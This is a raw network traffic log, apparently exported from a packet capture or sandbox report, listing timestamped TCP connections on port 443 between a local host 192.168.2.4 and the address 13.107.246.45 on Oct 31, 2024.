                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:15.208859921 CET4435131913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:15.208889008 CET51319443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:15.208897114 CET4435131913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:15.223259926 CET51325443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:15.223310947 CET4435132513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:15.223395109 CET51325443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:15.223570108 CET51325443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:15.223587990 CET4435132513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:15.693372965 CET4435132113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:15.693905115 CET4435132213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:15.694178104 CET51321443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:15.694190979 CET4435132113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:15.694768906 CET51321443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:15.694775105 CET4435132113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:15.695709944 CET51322443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:15.695736885 CET4435132213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:15.696136951 CET51322443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:15.696145058 CET4435132213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:15.809748888 CET4435132313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:15.810451984 CET51323443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:15.810462952 CET4435132313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:15.810863018 CET51323443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:15.810868025 CET4435132313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:15.823407888 CET4435132213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:15.823471069 CET4435132213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:15.823550940 CET51322443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:15.823803902 CET51322443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:15.823824883 CET4435132213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:15.823836088 CET51322443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:15.823843002 CET4435132213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:15.825154066 CET4435132113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:15.825216055 CET4435132113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:15.825272083 CET51321443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:15.825402975 CET51321443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:15.825402975 CET51321443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:15.825419903 CET4435132113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:15.825429916 CET4435132113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:15.827583075 CET51327443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:15.827583075 CET51326443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:15.827617884 CET4435132713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:15.827626944 CET4435132613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:15.827702045 CET51327443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:15.827840090 CET51327443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:15.827841043 CET51326443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:15.827841043 CET51326443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:15.827852011 CET4435132713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:15.827879906 CET4435132613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:15.907727003 CET4435132413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:15.908366919 CET51324443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:15.908409119 CET4435132413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:15.908874035 CET51324443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:15.908881903 CET4435132413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:15.944591045 CET4435132513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:15.944679976 CET4435132313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:15.945168018 CET51325443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:15.945198059 CET4435132513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:15.945365906 CET4435132313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:15.945424080 CET51323443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:15.945476055 CET51323443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:15.945497036 CET4435132313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:15.945518970 CET51323443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:15.945525885 CET4435132313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:15.945785046 CET51325443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:15.945791960 CET4435132513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:15.948465109 CET51328443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:15.948519945 CET4435132813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:15.948601961 CET51328443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:15.948724985 CET51328443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:15.948740005 CET4435132813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.035720110 CET4435132413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.035912037 CET4435132413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.035969973 CET51324443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.036072016 CET51324443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.036097050 CET4435132413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.036112070 CET51324443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.036120892 CET4435132413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.039570093 CET51329443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.039601088 CET4435132913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.039705038 CET51329443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.039850950 CET51329443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.039860010 CET4435132913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.075753927 CET4435132513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.075885057 CET4435132513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.075967073 CET51325443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.076162100 CET51325443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.076184988 CET4435132513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.076198101 CET51325443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.076204062 CET4435132513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.079282999 CET51330443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.079329014 CET4435133013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.079394102 CET51330443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.079550028 CET51330443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.079564095 CET4435133013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.567018986 CET4435132713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.567692041 CET51327443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.567712069 CET4435132713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.568402052 CET51327443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.568408012 CET4435132713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.570836067 CET4435132613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.571248055 CET51326443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.571279049 CET4435132613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.571707010 CET51326443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.571712971 CET4435132613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.692257881 CET4435132813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.695185900 CET51328443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.695216894 CET4435132813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.695869923 CET51328443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.695875883 CET4435132813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.701412916 CET4435132613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.701486111 CET4435132613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.701560020 CET51326443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.701736927 CET51326443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.701736927 CET51326443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.701756001 CET4435132613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.701767921 CET4435132613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.704813957 CET51331443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.704858065 CET4435133113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.705027103 CET51331443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.705096006 CET51331443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.705104113 CET4435133113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.757720947 CET4435132913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.758337975 CET51329443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.758369923 CET4435132913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.759028912 CET51329443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.759035110 CET4435132913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.808168888 CET4435133013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.808787107 CET51330443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.808821917 CET4435133013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.809324980 CET51330443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.809331894 CET4435133013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.823554039 CET4435132813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.823669910 CET4435132813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.823736906 CET51328443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.824023008 CET51328443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.824023008 CET51328443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.824044943 CET4435132813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.824055910 CET4435132813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.826958895 CET51332443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.827012062 CET4435133213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.827104092 CET51332443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.827264071 CET51332443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.827276945 CET4435133213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.859304905 CET4435132713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.859406948 CET4435132713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.859487057 CET51327443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.859831095 CET51327443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.859831095 CET51327443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.859847069 CET4435132713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.859857082 CET4435132713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.863230944 CET51333443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.863259077 CET4435133313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.863343000 CET51333443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.863492012 CET51333443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.863502026 CET4435133313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.884608030 CET4435132913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.884690046 CET4435132913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.884862900 CET51329443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.884987116 CET51329443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.885001898 CET4435132913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.885015011 CET51329443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.885020971 CET4435132913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.887892962 CET51334443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.887943029 CET4435133413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.888026953 CET51334443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.888154030 CET51334443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.888168097 CET4435133413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.937426090 CET4435133013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.937593937 CET4435133013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.937654972 CET51330443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.937843084 CET51330443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.937864065 CET4435133013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.937875986 CET51330443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.937884092 CET4435133013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.941880941 CET51335443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.941911936 CET4435133513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.941984892 CET51335443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.942148924 CET51335443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:16.942164898 CET4435133513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.422113895 CET4435133113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.431142092 CET51331443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.431169033 CET4435133113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.434817076 CET51331443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.434825897 CET4435133113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.557925940 CET4435133113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.557946920 CET4435133113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.557995081 CET51331443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.558003902 CET4435133113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.558026075 CET4435133113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.558075905 CET51331443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.558381081 CET51331443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.558387041 CET4435133113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.558403015 CET51331443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.558407068 CET4435133113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.559290886 CET4435133213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.559817076 CET51332443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.559830904 CET4435133213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.560405016 CET51332443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.560410976 CET4435133213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.561640978 CET51337443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.561688900 CET4435133713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.561785936 CET51337443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.561964989 CET51337443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.561976910 CET4435133713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.626868010 CET4435133413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.628036022 CET51334443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.628077030 CET4435133413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.628514051 CET51334443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.628519058 CET4435133413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.632814884 CET4435133313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.633363962 CET51333443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.633384943 CET4435133313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.633805990 CET51333443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.633815050 CET4435133313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.684735060 CET4435133513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.685244083 CET51335443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.685271978 CET4435133513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.685827017 CET51335443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.685832977 CET4435133513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.689136982 CET4435133213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.689385891 CET4435133213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.689450026 CET51332443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.689483881 CET51332443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.689506054 CET51332443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.689506054 CET4435133213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.689512014 CET4435133213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.692476034 CET51338443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.692514896 CET4435133813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.692600012 CET51338443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.692723036 CET51338443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.692743063 CET4435133813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.761158943 CET4435133413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.761183977 CET4435133413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.761245966 CET4435133413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.761272907 CET51334443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.761305094 CET51334443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.761503935 CET51334443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.761503935 CET51334443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.761532068 CET4435133413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.761540890 CET4435133413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.764199018 CET51339443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.764233112 CET4435133913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.764301062 CET51339443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.764471054 CET51339443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.764477015 CET4435133913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.768661022 CET4435133313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.769233942 CET4435133313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.769294977 CET51333443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.769323111 CET51333443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.769323111 CET51333443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.769335032 CET4435133313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.769344091 CET4435133313.107.246.45192.168.2.4
